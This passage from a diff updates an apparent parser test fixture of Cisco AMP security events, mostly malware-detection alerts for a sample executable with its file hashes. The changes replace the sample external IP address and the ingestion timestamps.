Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898122Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1767,7 +1677,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1817,7 +1727,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1830,8 +1740,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070164200Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898127900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1853,7 +1763,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1903,7 +1813,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1916,8 +1826,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070166224Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898131700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1939,7 +1849,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1989,7 +1899,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2006,8 +1916,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070168263Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898136400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2029,7 +1939,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2079,7 +1989,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2096,8 +2006,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070170310Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898142300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2119,7 +2029,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2169,7 +2079,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2182,8 +2092,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070172324Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898148100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2205,7 +2115,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2255,7 +2165,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2268,8 +2178,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070174535Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898152600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2291,7 +2201,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2338,7 +2248,7 @@ "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2348,8 +2258,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-30T00:14:16.070176587Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}", + "ingested": "2021-12-09T13:35:32.898157500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application 